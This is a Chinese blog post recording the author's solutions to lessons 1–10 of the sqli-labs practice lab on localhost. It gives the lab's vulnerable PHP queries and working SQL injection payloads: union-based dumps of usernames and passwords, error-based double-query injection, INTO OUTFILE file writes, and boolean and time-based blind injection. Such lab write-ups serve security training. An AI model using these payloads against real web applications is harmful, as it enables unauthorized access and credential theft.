SQLI-LAB  的 实战记录(Less 1 - Less 10)

最新推荐文章于 2024-04-15 18:22:08 发布
最新推荐文章于 2024-04-15 18:22:08 发布
阅读量3.3k 收藏 5
点赞数 1
分类专栏: sql注入 文章标签: sqli-lab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_21500173/article/details/51917418
版权

以下内容 只是 本人 在做 sqli-lab 练习时 写下的记录,仅供参考。
因为本人学过一些sql注入的内容,所以大部分内容是没有讲解的,如有不清楚的地方,请自行使用搜索引擎查询,相信会得到所需的内容。

Less - 1 Error Based- String

(第1节:基于错误 – 字符串)

字符型注入,也即是通过Get或者Post方式传进去的数据被单引号或者双引号包裹住

Test:

    http://localhost/sqli-lab/Less-1/index.php?id=2'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”2” LIMIT 0,1’ at line 1
注: 报错中limit前面的是 ‘2” 对比URL上的 2’,可推断,php的sql语句中 $id 可能被 单引号 包裹

Sourse Code:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
 } else {
    print_r(mysql_error());
}

注:id被单引号包裹;不报错的时候,会显示username和password这两个位置的内容

Solution:

' or '1'='1
    http://localhost/sqli-lab/Less-1/index.php?id=1' or '1'='1

'  --+
    http://localhost/sqli-lab/Less-1/index.php?id= 1'  --+

     其它:

    http://localhost/sqli-lab/Less-1/index.php?id=0' union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-1/index.php?id= ' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' or '1

    http://localhost/sqli-lab/Less-1/index.php?id=0 ' union select 1,group_concat(username),group_concat(password) from security.users --+

Less - 2 Error Based- Intiger

(第2课:基于错误 – 数字型)

Test:

    http://localhost/sqli-lab/Less-2/index.php?id=2"/

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”/ LIMIT 0,1’ at line 1
注: 报错中limit前面的是 “/ 和URL上的一样,可推断,php的sql语句中 $id 可能没有被其它符号包裹

Sourse Code:

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
    print_r(mysql_error());
}

注:id被双引号包裹;不报错的时候,会显示username和password这两个位置的内容

Solution:

or 1=1
     http://localhost/sqli-lab/Less-2/index.php?id= 1 or 1=1

or 1=1 --
    http://localhost/sqli-lab/Less-2/index.php?id= 1 or 1=1 --

--+
    http://localhost/sqli-lab/Less-2/index.php?id= 1 --+

     其它:

    http://localhost/sqli-lab/Less-2/index.php?id= 0 union select 1,version(),database()

    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'

    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(username),group_concat(password) from security.users

    补充:

暴用户名、版本号、库名和路径
    http://localhost/sqli-lab/Less-2/index.php?id=0  union select 1,2,group_concat(user(),0x5e5e,version(),0x5e5e,database(),0x5e5e,@@basedir) --+

暴所在库的所有表名
    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

暴列名
    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

暴username和password的内容
    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(username,0x5e,password),3 from users --

Less - 3 Error Based- String (with Twist)

(第3课:基于错误- 字符串(变形))

Test:

http://localhost/sqli-lab/Less-3/index.php?id=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1”) LIMIT 0,1’ at line 1

http://localhost/sqli-lab/Less-3/index.php?id=1' or 1=1

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”) LIMIT 0,1’ at line 1
注:报错中出现 ‘) 推断SQL语句中 应有 (‘$id’)存在

Sourse Code:

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
    print_r(mysql_error());
}

注:被(”) 包裹

Solution:

') or '1'=('1
     http://localhost/sqli-lab/Less-3/index.php?id=1 ') or '1'=('1

) or 1=1 --+
     http://localhost/sqli-lab/Less-3/index.php?id=1) or 1=1 --+

     其它:

    http://localhost/sqli-lab/Less-3/index.php?id=0') union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-3/index.php?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --+

    http://localhost/sqli-lab/Less-3/index.php?id=0') union select 1,group_concat(username),group_concat(password) from security.users --+

Less - 4 Error Based- DoubleQuotes String

(第4课:基于错误 - 双引号 字符串)

Test:

    http://localhost/sqli-lab/Less-4/index.php?id=2"/
 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '") LIMIT 0,1' at line 1
 注: 报错中limit前面的是 ") 对比URL上的 2"/,可推断,php的sql语句中 $id 是被 双引号和一层括号 包裹

Sourse Code:

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
      echo "<font size='5' color= '#99FF00'>";
      echo 'Your Login name:'. $row['username'];
      echo "<br>";
      echo 'Your Password:' .$row['password'];
      echo "</font>";
}else{
    echo '<font color= "#FFFF00">';
    print_r(mysql_error());
    echo "</font>"; 
}

注:加了一层双引号和括号

Solution:

")or ("1")=("1
    http://localhost/sqli-lab/Less-4/index.php?id=1")or ("1")=("1

")or 1=1 --+
    http://localhost/sqli-lab/Less-4/index.php?id=1")or 1=1 --+

     其它:

    http://localhost/sqli-lab/Less-4/index.php?id=0") union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-4/index.php?id=0") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --+

    http://localhost/sqli-lab/Less-4/index.php?id=0") union select 1,group_concat(username),group_concat(password) from security.users --+

Less - 5 Double Query- Single Quotes- String

(第5课:双注入 - 单引号 - 字符串)

Test:

    http://localhost/sqli-lab/Less-5/index.php?id=2"/

注:未报错,只显示 You are in……….. 

    http://localhost/sqli-lab/Less-5/index.php?id=2'"' --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”’ – ’ LIMIT 0,1’ at line 1
注:能正常报错,考虑使用报错来获取信息,同时 limit前为 “’–’ 可以推断 $id是用单引号包裹的

双注入查询需要四个函数/语句
1. Rand() //随机函数
2. Floor() //取整函数
3. Count() //汇总函数
4. Group by clause //分组语句
双注入的原理,简单一句话原理就是有研究人员发现,当在一个聚合函数,比如count函数后面如果使用分组语句(group by)就会把查询的一部分以错误的形式显示出来“通过floor报错的方法来爆数据的本质是group by语句的报错。group by语句报错的原因是floor(random(0)*2)的不确定性,即可能为0也可能为1(group by key的原理是循环读取数据的每一行,将结果保存于临时表中。读取每一行的key时,如果key存在于临时表中,则不在临时表中则更新临时表中的数据;如果该key不存在于临时表中,则在临时表中插入key所在行的数据。group by floor(random(0)*2)出错的原因是key是个随机数,检测临时表中key是否存在时计算了一下floor(random(0)*2)可能为0,如果此时临时表只有key为1的行不存在key为0的行,那么数据库要将该条记录插入临时表,由于是随机数,插时又要计算一下随机值,此时floor(random(0)*2)结果可能为1,就会导致插入时冲突而报错。即检测时和插入时两次计算了随机数的值。具体原理参考:http://www.mysqlops.com/2012/05/15/mysql-sql-analyze.html)。”

Sourse Code:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'You are in...........';
}else{
    print_r(mysql_error());
}

注:$id被单引号包围,URL正确时除可能知道格式外,无法获取其它信息;错误时有正常报错,可以考虑从报错入手

Solution:

' union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    其它:

    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select count(*),0,concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select count(*),0,concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    版本号::数据库名::用户名
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    表名
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    列名
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    行数
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第一行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第二行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第三行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第四行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第五行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 4,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第六行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 5,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第七行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 6,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第八行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 7,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

注:如果没有现成的注入语句,建议使用mysql逐步测试出可用的语句

Less - 6 Double Query- Double Quotes- String

(第6课:双注入 - 双引号 - 字符串)

Test:

    http://localhost/sqli-lab/Less-6/index.php?id=2'"' --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” – ” LIMIT 0,1’ at line 1
注: 能正常报错, limit前是 ’ – ” ,推断 $id 是被双引号包裹

Sourse Code:

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){   
    echo 'You are in...........';
}else{
    print_r(mysql_error());
}

注:$id被双引号包围,URL正确时除可能知道格式外,无法获取其它信息;错误时有正常报错,可以考虑从报错入手

Solution:

" union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less6/index.php?id= 0" union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

     其它:

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select count(*),0,concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select count(*),0,concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+


    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns wheretable_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

Less - 7 Dump into Outfile

(第7课:转储文件)

Test:

    http://localhost/sqli-lab/Less-7/index.php?id=2

You are in…. Use outfile……
注:和之前一样 正常时除可能的格式和提示的使用 outfile以外,无其它有效信息

    http://localhost/sqli-lab/Less-7/index.php?id=2' --+

You have an error in your SQL syntax
注:得不到详细的报错

    http://localhost/sqli-lab/Less-7/index.php?id=2')) --+

注:正常,$id周围 应是单引号和双层括号

Sourse Code:

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'You are in.... Use outfile......';
}else{
    echo 'You have an error in your SQL syntax'; 
}

注:$id被双层括号和单引号包围,URL正确时有提示 用outfile,错误时只知有错误

Solution:

2')) union select 1,2,3 into outfile  "F:\\666.txt" --+

     http://localhost/sqli-lab/Less-7/index.php?id=2')) union select 1,2,3 into outfile  "F:\\666.txt" --+

     其它:

    http://localhost/sqli-lab/Less-7/index.php?id=2')) union select username,'~~',password from users into outfile  "F:\\666.txt" --+

Less - 8 Blind- Boolian- Single Quotes- String

(第8课:盲注 - 基于布尔值 - 单引号 - 字符串)

Test:

    http://localhost/sqli-lab/Less-8/index.php?id=2'

注:什么都没有显示,加上括号也不行 

    http://localhost/sqli-lab/Less-8/index.php?id=2' --+

You are in………..
注:根据前几次的经验,这句话说明 能查出,没有报错,那么之前那个估计是错了

    http://localhost/sqli-lab/Less-8/index.php?id=2"

You are in………..
注:没报错,双引号加上或改成括号也都没错,看来$id是被单引号圈着了
因为除了对错什么都判断不出来,所以考虑构造只需判断对错的语句,盲注

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,1,1))) < 116 --+

注:正确。substr(待截断的字符串,开始位置,截断长度)

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,1,1))) < 115 --+

注:没显示,则这是错的,对照ascii,也说明 数据库第一个字符是 小写的s

Sourse Code:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
      echo 'You are in...........';
}else{
}

Solution:

2' and (ascii(substr((select database()) ,1,1))) = 115 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,1,1))) = 115 --+

     其它:

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (length(database())) = 8 --+

注:数库名长度=8

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,1,1))) = 115 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,2,1))) = 101 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,3,1))) = 99 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,4,1))) = 117 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,5,1))) = 114 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,6,1))) = 105 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,7,1))) = 116 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,8,1))) = 121 --+  

注:数据库名 security

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) = 101 --+

注:第一张表 表名长度=6,第一个字符是 e

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,2,1))) = 115 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,3,1))) = 101 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,4,1))) = 114 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,5,1))) = 115 --+

注:第四张表是users

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select username from users limit 0,1) ,1,1))) = 68 --+

注:users表第一行 的username 第一个字母 D

Less - 9 Blind- Time based- Single Quotes- String

(第9课:盲注 - 基于时间 - 单引号 - 字符串)

Test:

    http://localhost/sqli-lab/Less-9/index.php?id=2
    http://localhost/sqli-lab/Less-9/index.php?id=2'
    http://localhost/sqli-lab/Less-9/index.php?id=2"
    http://localhost/sqli-lab/Less-9/index.php?id=2')

都只显示 You are in………..这情况八成是要盲注,仅单纯的布尔值是不行了
(感谢这道题在提示是基于时间的。。。)

Sourse Code:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
      echo 'You are in...........';
}else{
    echo 'You are in...........';
}

Solution:

    http://localhost/sqli-lab/Less-9/index.php?id=1'+and+if(1=1, sleep(1), null)+ --+

注:说明 and 前面是对的,会停1秒   

     其它:

    http://localhost/sqli-lab/Less-9/index.php?id=2' and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+

    http://localhost/sqli-lab/Less-9/index.php?id=2' and (ascii(substr((select database()) ,1,1))) = 115 +and+if(1=1, sleep(1), null)+ --+

Less - 10 Blind- Time based- Double Quotes- String

(第10课:盲注 - 基于时间 - 双引号 - 字符串)

Test:

    http://localhost/sqli-lab/Less-10/index.php?id=2' and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+

注:这个跳得挺快的,and前面是写错了

     http://localhost/sqli-lab/Less-10/index.php?id=2" and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+

注:这个对了

Sourse Code:

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'You are in...........';
}else{
    echo 'You are in...........';
}

Solution:

2" and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+

    http://localhost/sqli-lab/Less-10/index.php?id=2" and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+ 

     其它:

    http://localhost/sqli-lab/Less-10/index.php?id=2" and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+

    http://localhost/sqli-lab/Less-10/index.php?id=2" and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 +and+if(1=1, sleep(1), null)+ --+
战狼767
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-lab笔记--less01 (Error Based- String)
TYW168168的博客
10-17 393
      sqli-lab less01--Error Based- String(基于字符串错误)  (第1节:基于错误 – 字符串)   字符型注入,也即是通过Get或者Post方式传进去的数据被单引号或者双引号包裹住   TEST   http://127.0.0.1/sqli/Less-1/?id=1'   提示语法错误:           ...
【网安自学/web漏洞-day01】sqli-labs第一关
加油~
05-05 1254
Less-1 **Error Based- String** 原sql为 select * from users where id=1; 判断是否为字符型注入 select * form users where id=1’ 若界面改变则为字符型注入,猜列名的数量:select * from users where id=1' order by 5--+ (可以使用二分法进行) ;若为5的时候界面错误,4的时候界面不会报错了说明有三列 猜显示的位置: select * from users whe..
Sql-lab全解_sqllab,算法太TM重要了
最新发布
m0_62289956的博客
04-15 1212
id=1’ and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’)))–+使用语句admin“) and if(ascii(concat(database()))>0,sleep(5),sleep(10))#如果你能答对70%,找一个安全工作,问题不大。
Sqli-labs-master超详细通关教程(1-23关|基础篇)
热门推荐
weixin_51143375的博客
11-02 2万+
一到四关主要是参数被包装的问题。一般用于尝试的语句 Ps:--+可以用#替换,url 提交过程中 Url 编码后的#为%23 and1=2--+ 'and1=2--+ "and1=2--+ )and1=2--+ ')and1=2--+ ")and1=2--+ "))and1=2--+ 图中显示的sql语句是我为了方便理解,修改了源代码显示出的 第一关: 页面正常,考虑是否有字符注入,先加单引号 可以看到提示,存在' '包装,我们加上--+ http://127.0.0.
Sqli-Labs之less-1
ISNS的博客
02-03 1772
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 1.进入less-1的题目以后,我们可以看到这道题的提示“请输入ID作为带数值的参数”: 2.我们根据题目提示,尝试在URL中加上“?id=1”、“?id=2”,可以看到看到从数据库中查询到的用于登录login的用户名和密码: 我们要找的是网站后台管理员的用户名和密码,目的是拿到网站的权限,从...
sqli-lab教程——1-35通关
缘木之鱼
05-08 5729
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges)Less-1 GET - Error...
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-lab注入练习源码
06-25
通过sqli-lab实战练习,你不仅可以学习到如何进行SQL注入攻击,更重要的是,你还能了解到如何在实际开发中预防这种攻击,提升你的Web应用安全性。因此,无论你是开发者还是安全专业人员,这个平台都是提升SQL注入...
SQLi-Lab:每个SQL注入实验室
03-29
8. **实战演练**:通过SQLi-Lab提供的各种挑战,实践上述理论知识,增强识别和修复SQL注入漏洞的能力。 9. **工具使用**:了解和使用SQL注入检测工具,如Burp Suite、sqlmap等,以及如何利用它们进行自动化渗透测试...
sqli-lib64关闯关笔记学习资料.zip
08-22
总结的64关笔记,有之前师傅写的,也有我写的,可以作为参考,只要是存到这里防止丢失,有喜欢的朋友可以一起下载看看,学习一下,我常用的环境是WAMP。
sqli-libs基础篇总结(1-22)
qq_33557485的博客
08-15 2419
1.关于sqli-labs 这个是sql注入的靶场。可以在git上下载。 2.题目简介 前面的1-22题都是sql注入的基础题目。覆盖范围很广,不过都是针对mysql数据库的。 1-4题:union注入 5-8题:布尔盲注 9-10题:延时盲注 11-12题:post形式的显错注入 13-16题:post形式的布尔盲注 17题:update语句的显错注入 18-19题:htt...
sqli-lab详解——做题笔记1-10(入门级注解)
Dream__Catcher的博客
10-09 2523
less-1 单引号报错注入 源码:SELECT * FROM users WHERE id=’$id’ LIMIT 0,1 答案及解析: http://127.0.0.1/sqli-labs-master/Less-1/?id= ’ or ‘1’=‘1 ’ or 1=1 --+ (–后要加空格才能注释,但是在网址栏输入时最后加空格解析时会被去掉,所以用+,当然用%20也行) ’ or 1=...
小白入门SQL注入基础-基于Sqli-lab平台实战
DYBOY-程序开发&网络安全
06-08 4171
简介:SQL注入是一个常见的漏洞,在所有的安全防护统计数据儿结果中显示,SQL注入几乎占据网络攻击问题的60%左右,由此可见SQL注入漏洞是一种常见的WEB漏洞,了解SQL注入对于网络安全工作者或安全爱好者来说,是非常有必要,本文章主要通过sqli平台来具体阐述SQL注入漏洞产生的原因和利用方法。 0x00 SQL注入漏洞简介 有关SQL注入的各种定义阐述已经很多,大家可自行使用搜索引...
sqlmap学习(sqli-labs为示例)
quan9i的博客
02-17 4228
文章目录前言sql-map部分指令- -is-dba- -current-D,-T,-C- -dump-v--batchget类型检测可注入类型获取数据库获取表获取列名获取字段信息post类型准备工作检测可注入类型破解数据库方法一方法二破解数据表方法一方法二获取列名方法一方法二获取字段信息方法一方法二 前言 由于python学的啥也不是,脚本写的也很不咋滴(不会写),因此来学习sqlmap的使用,本人只是小白,如果出现错误还请各位师傅多多指正。 sql-map部分指令 - -is-dba --is-dba判
sqli-labs Less-5解题思路
qq_35266419的博客
05-12 638
从本节开始就学习盲注,思路较 Less1-4略有不同,请仔细体会 Less-5 Get-Double injection-Single Quotes - String (1)查看页面源代码 通过页面源代码,什么都不显示 (2)猜测数据库的长度 当数据库长度正确和错误时,如上图所示 (3)现在开始猜测数据库第一位(其实盲注和前面几个的解题思路一样,只是手法稍有不同) (4)猜测数据库名称第二...
sqli-labs教程——Less 1-10
Lilin's博客
12-10 641
sqli-labs教程——Less 1-10 Page-1 Basic ChallengesLess-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)1. 判断是否有注入点2. 判断闭合字符3. 判断当前页面中sql语句的查询列数4. 判断数据在页面中的回显位置和sql语句中回显位5. 判断当前页面连接的数据库名称6. 判断security数据库中的表名称信息7. 判断users表的列名称信息8. 查询users表的所有信息Less
sqli-lab 闯关教程 Less-3
羽路星尘的博客
10-29 245
每天一个注入小实验,过程仅供参考,如有建议或指正欢迎留言,对本文风格的建议也可以留在评论区哟。
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值